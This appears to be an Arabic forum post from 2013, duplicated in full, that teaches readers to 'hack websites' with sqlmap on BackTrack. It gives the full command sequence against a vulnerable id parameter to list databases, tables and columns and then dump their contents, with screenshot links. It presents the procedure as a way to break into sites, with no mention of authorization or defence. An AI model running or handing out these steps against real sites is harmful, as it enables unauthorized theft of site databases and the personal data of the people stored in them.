abdallahashour
05-08-2013, 11:49 AM
http://4.bp.blogspot.com/-wqSokBLTN6k/USdqK4YWiJI/AAAAAAAAAUE/dkxIHVS7veQ/s400/images.jpg
(Hack websites using Backtrack (sqlmap
شرح إختراق المواقع باستخدام الباك تراك (sqlmap)
http://www.liilas.com/up/uploads/liilas_13318292871.gif
http://robiulhoque.in/wp-content/uploads/2012/06/SQL-Injection-Attack.jpg
sqlmap
هو أداة حقن SQL التلقائي التي تساعدك على الإختراق الموقع بسهولة تامة.
اتبع الخطوات البسيطة
اولاً: فتح ال sqlmap في ال backtrack
هناك طريقتان
1
http://img132.imageshack.us/img132/5500/13711831.png
OR
2
نقوم بفتح التيرمنال ونكتب الامر التالي
cd /pentest/database/sqlmap
http://lh6.ggpht.com/-mSC2LYGSnQo/UA6N0pHpgpI/AAAAAAAACSA/hv-60OpaAek/sql-map-1_thumb1.png?imgmax=800
ثانياً: نقوم بوضع الموقع الذي توجد بة ثغرة sql
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 --dbs
http://lh4.ggpht.com/-BqIRHIXaKFc/UA6N9XLYDeI/AAAAAAAACSQ/MaCK7hOe3iQ/sql-map-2-_thumb1.png?imgmax=800
بعد تنفيذ الامر سوف تظهر لنا اسم قاعدة البيانات
http://lh4.ggpht.com/-EcmfcbZbw0A/UA6OE8NurOI/AAAAAAAACSg/WAOO4OHpc6A/sql-map-3_thumb1.png?imgmax=800
ثالثاً: لاستخراج اسماء الجداول الموجودة داخل قاعدة البيانات
ننفذ الامر التالي
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) –tables
http://lh5.ggpht.com/-B8Eclp2Zxrw/UA6OHUgdyRI/AAAAAAAACSw/EcRawEdp0ng/sql-map-4_thumb2.png?imgmax=800
بعد تنفيذ الامر نحصل على اسماء الجداول الموجودة داخل قاعدة البيانات
http://lh4.ggpht.com/-3xVRUVAGWhY/UA6OMB0p2LI/AAAAAAAACTA/-D3WZZki8Io/sql-map-5_thumb2.png?imgmax=800
رابعاً: استخراج الاعمدة الخاصة بجدول معين
ننفذ الامر التالي
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) -T (Table name) --columns
بعد تنفيذ الامر وكتابة اسم الجدول الذي نريد استخراج الاعمدة الخاصة بة ستظهر لنا اسماء الاعمدة ونوع البيانات
http://lh3.ggpht.com/-eENV89E67yo/UA6OOv_SzqI/AAAAAAAACTQ/rPhRWTCMN88/sql%252520map%2525207_thumb%25255B1%25255D.png?img max=800
خامساً: استخراج البيانات الموجودة داخل الاعمدة
ننفذ الامر التالي
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) -T (Table name) -C (column1_name,column2_name,....) --dump
بعد تنفيذ الامر وكتابة اسماء الاعمدة التي نريد استخراج بياناتها ستظهر لنا
http://lh4.ggpht.com/-jQm5qeDcXEU/UA6ORwYqY5I/AAAAAAAACTg/JNbJhcsasCs/sql%252520map%2525209_thumb%25255B1%25255D.png?img max=800
او تابع الشرح التالي
http://www.youtube.com/watch?v=zAMVoxZ49yc
ارجو ان ينال اعجابكم
وان تستفيدو من هذا الشرح
وارجو ان يكون الشرح سهل وممتع
http://files2.fatakat.com/2012/4/13346492641342.gif
(Hack websites using Backtrack (sqlmap
شرح إختراق المواقع باستخدام الباك تراك (sqlmap)
http://www.liilas.com/up/uploads/liilas_13318292871.gif
http://robiulhoque.in/wp-content/uploads/2012/06/SQL-Injection-Attack.jpg
sqlmap
هو أداة حقن SQL التلقائي التي تساعدك على الإختراق الموقع بسهولة تامة.
اتبع الخطوات البسيطة
اولاً: فتح ال sqlmap في ال backtrack
هناك طريقتان
1
http://img132.imageshack.us/img132/5500/13711831.png
OR
2
نقوم بفتح التيرمنال ونكتب الامر التالي
cd /pentest/database/sqlmap
http://lh6.ggpht.com/-mSC2LYGSnQo/UA6N0pHpgpI/AAAAAAAACSA/hv-60OpaAek/sql-map-1_thumb1.png?imgmax=800
ثانياً: نقوم بوضع الموقع الذي توجد بة ثغرة sql
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 --dbs
http://lh4.ggpht.com/-BqIRHIXaKFc/UA6N9XLYDeI/AAAAAAAACSQ/MaCK7hOe3iQ/sql-map-2-_thumb1.png?imgmax=800
بعد تنفيذ الامر سوف تظهر لنا اسم قاعدة البيانات
http://lh4.ggpht.com/-EcmfcbZbw0A/UA6OE8NurOI/AAAAAAAACSg/WAOO4OHpc6A/sql-map-3_thumb1.png?imgmax=800
ثالثاً: لاستخراج اسماء الجداول الموجودة داخل قاعدة البيانات
ننفذ الامر التالي
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) –tables
http://lh5.ggpht.com/-B8Eclp2Zxrw/UA6OHUgdyRI/AAAAAAAACSw/EcRawEdp0ng/sql-map-4_thumb2.png?imgmax=800
بعد تنفيذ الامر نحصل على اسماء الجداول الموجودة داخل قاعدة البيانات
http://lh4.ggpht.com/-3xVRUVAGWhY/UA6OMB0p2LI/AAAAAAAACTA/-D3WZZki8Io/sql-map-5_thumb2.png?imgmax=800
رابعاً: استخراج الاعمدة الخاصة بجدول معين
ننفذ الامر التالي
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) -T (Table name) --columns
بعد تنفيذ الامر وكتابة اسم الجدول الذي نريد استخراج الاعمدة الخاصة بة ستظهر لنا اسماء الاعمدة ونوع البيانات
http://lh3.ggpht.com/-eENV89E67yo/UA6OOv_SzqI/AAAAAAAACTQ/rPhRWTCMN88/sql%252520map%2525207_thumb%25255B1%25255D.png?img max=800
خامساً: استخراج البيانات الموجودة داخل الاعمدة
ننفذ الامر التالي
python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) -T (Table name) -C (column1_name,column2_name,....) --dump
بعد تنفيذ الامر وكتابة اسماء الاعمدة التي نريد استخراج بياناتها ستظهر لنا
http://lh4.ggpht.com/-jQm5qeDcXEU/UA6ORwYqY5I/AAAAAAAACTg/JNbJhcsasCs/sql%252520map%2525209_thumb%25255B1%25255D.png?img max=800
او تابع الشرح التالي
http://www.youtube.com/watch?v=zAMVoxZ49yc
ارجو ان ينال اعجابكم
وان تستفيدو من هذا الشرح
وارجو ان يكون الشرح سهل وممتع
http://files2.fatakat.com/2012/4/13346492641342.gif